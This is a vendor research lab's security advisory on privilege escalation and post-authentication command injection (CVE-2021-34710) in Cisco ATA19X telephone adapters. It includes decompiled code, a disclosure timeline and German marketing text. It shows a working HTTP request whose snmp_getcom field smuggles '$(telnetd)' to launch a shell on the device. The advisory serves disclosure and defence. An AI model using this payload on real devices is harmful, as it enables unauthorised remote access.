Advisory: Cisco ATA19X Privilege Escalation and RCE

- Lack of User Privilege Separation Enforcement in Web Management Interface: The web management interface on the ATA191 does not necessarily prevent the "user" account from performing "admin"-privileged actions. As such, a user who logs in with "user" privileges is able to perform actions that should only be performed by an "admin" user.
- Post-Authentication Command Injection Remote Code Execution (CVE-2021-34710): The web management interface suffers from a post-authentication command injection issue, which can be exploited by an authenticated user.
- ATA 190 (On-premises only)
- ATA 191 (On-premises or Multiplatform)
- ATA 192 (Multiplatform only)

Affected vendor & product Vendor Advisory | Cisco VOIP Adapter ATA19X (www.cisco.com) Cisco ATA 190 Series Analog Telephone Adapter Software Vulnerabilities |
Vulnerable version | < 12.0(1)SR4 < 11.2.1 |
Fixed version | 12.0(1)SR4 11.2.1 |
CVE IDs | CVE-2021-34710 |
Impact | 8.8 (high) CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
Credit | T. Shiomitsu, IoT Inspector Research Lab |
Cisco ATA19X Lack of User Privilege Separation Enforcement in Web Management Interface Root Cause Analysis
httpd
do_log_in_cgi()
httpd
do_auth()
Cisco ATA19X Post-Authentication Command Injection Remote Code Execution (CVE-2021-34710)
send_out_trap()
libspeak.so
system()
do_log_in_cgi()
httpd
iVar1 = WebUser_Do_Auth(user,pwd,1,1); if (iVar1 == -1) { nvram_set_printf("http_login_time","%d",iVar3 + 1); ct_syslog(5,3,"Login failed. Incorrect user name or password!"); addLoginFailInfo(client_ip); send_out_trap(0xb,0); return -1; }
send_out_trap()
snmptrap
- Configure SNMP trapping.
- Ensure that one of the trap parameters we pass is an injection string.
- Trigger the trap invocation somehow.
/apply.cgi
snmp_getcom
/apply.cgi
POST /apply.cgi HTTP/1.1 Host: 192.168.1.149 Content-Type: application/x-www-form-urlencoded Content-Length: 483 Origin: http://192.168.1.149 Connection: close Referer: http://192.168.1.149/SNMP.asp Cookie: SESSIONID=[...] Upgrade-Insecure-Requests: 1 submit_button=SNMP&submit_type=&change_action=&gui_action=Apply&request_token=[...]&sortby=&snmp_trust=0.0.0.0%2F0.0.0.0&snmp_trust_origin=0.0.0.0%2F0.0.0.0&trap_ver=v1&snmp_reset_trusted=2&snmp_trust_prefix_ipv6=0&closeflg=0&privilege_str=&snmp_enable=1&snmp_trust_check=0&snmp_trust_check_v6=0&snmp_getcom=%24%28telnetd%29&snmp_setcom=private&snmpv3_enable=0&trap_ipaddr=192.168.15.100&trap_ipaddr_0=192.168.15.100&trap_port=162&snmp_ver=0&privilege_end=
$(telnetd)
snmp_getcom
send_out_trap()
snmp_getcom
system()
nvram_sec_get("snmp_getcom",snmp_getcom,0x40); [...] cmd_fs = "snmptrap -%s -c %s %s:%s \"\" %s"; [...] snprintf(cmd_buf,0x100,cmd_fs,trap_ver,snmp_getcom,trap_ipaddr_,trap_port,trap); [...] iVar2 = system(cmd_buf);
Conclusion
Timeline
2021/02/23 - Initial disclosure to Cisco PSIRT. 2021/03/02 - Confirmation of receipt by Cisco PSIRT case manager. 2021/03/02 - We confirm receipt and ask to be kept updated. 2021/03/29 - Cisco PSIRT follow up to state that the issues are being worked on. 2021/08/13 - Cisco PSIRT follow up to state that release date is tentatively early October. 2021/08/25 - We confirm receipt, and request updates. 2021/09/29 - Cisco PSIRT follow up with release date of October 6th. 2021/10/06 - Cisco publish their advisory. 2021/10/06 - We e-mail Cisco to request confirmation around the privilege escalation issue. 2021/10/07 - Cisco respond stating that they will be unable to answer this question until next week. 2021/10/07 - This article published.
Über Onekey
ONEKEY ist der führende europäische Spezialist für Product Cybersecurity & Compliance Management und Teil des Anlageportfolios von PricewaterhouseCoopers Deutschland (PwC). Die einzigartige Kombination der automatisierten ONEKEY Product Cybersecurity & Compliance Platform (OCP) mit Expertenwissen und Beratungsdiensten bietet schnelle und umfassende Analyse-, Support- und Verwaltungsfunktionen zur Verbesserung der Produktsicherheit und -konformität — vom Kauf über das Design, die Entwicklung, die Produktion bis hin zum Ende des Produktlebenszyklus.

KONTAKT:
Sara Fortmann
Senior Marketing Manager
sara.fortmann@onekey.com
euromarcom public relations GmbH
team@euromarcom.de
VERWANDTE FORSCHUNGSARTIKEL

Security Advisory: Remote Code Execution on Viasat Modems (CVE-2024-6199)
Explore ONEKEY Research Lab's security advisory detailing a critical vulnerability in Viasat modems. Learn about the risks and recommended actions.

Security Advisory: Remote Code Execution on Viasat Modems (CVE-2024-6198)
Explore ONEKEY Research Lab's security advisory detailing a critical vulnerability in Viasat modems. Learn about the risks and recommended actions.

Unblob 2024 Highlights: Sandboxing, Reporting, and Community Milestones
Explore the latest developments in Unblob, including enhanced sandboxing with Landlock, improved carving reporting, and χ² randomness analysis. Celebrate community contributions, academic research collaborations, and new format handlers, while looking forward to exciting updates in 2025.
Bereit zur automatisierung ihrer Cybersicherheit & Compliance?
Machen Sie Cybersicherheit und Compliance mit ONEKEY effizient und effektiv.